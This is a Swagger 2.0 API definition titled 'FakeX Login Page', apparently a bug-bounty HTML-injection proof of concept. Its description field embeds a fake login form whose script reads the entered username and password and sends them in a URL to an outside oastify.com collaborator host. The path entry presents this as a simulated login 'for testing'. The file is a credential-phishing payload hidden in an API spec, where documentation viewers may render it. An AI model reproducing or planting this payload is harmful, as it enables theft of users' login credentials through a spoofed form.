swagger: '2.0'
info:
  version: 1.0.0
  title: FakeX Login Page
  description: |
    ## Example HTML:
    <div class="login-form">
      <div class="heading">
        <h1>HTML Injection: Fake Login by @HACKERONE</h1>
      </div>
      <div>
        <label for="username">Username</label> 
        <input size="20" name="username" id="username" type="text" autocomplete="username"> 
      </div> 
      <div> 
        <label for="password">Password</label> 
        <input size="20" name="password" id="password" type="text" autocomplete="current-password"> <!-- Password visible -->
      </div> 
      <div> 
        <button type="submit" onclick="submitForm()">Login</button> 
      </div>

      <script>
        function submitForm() {
          var username = document.getElementById('username').value;
          var password = document.getElementById('password').value;
          var url = 'http://vut6p667ecusj96e7aohhsgj9af13vrk.oastify.com/?credentials?username=' + encodeURIComponent(username) + '&password=' + encodeURIComponent(password);
          window.location.href = url;
        }
      </script>
    </div>

paths:
  /:
    post:
      summary: Simulate login
      description: Simulate a login by capturing username and password and sending it to a remote URL for testing.
      parameters:
        - name: username
          in: formData
          required: true
          type: string
        - name: password
          in: formData
          required: true
          type: string
      responses:
        '200':
          description: Login successful
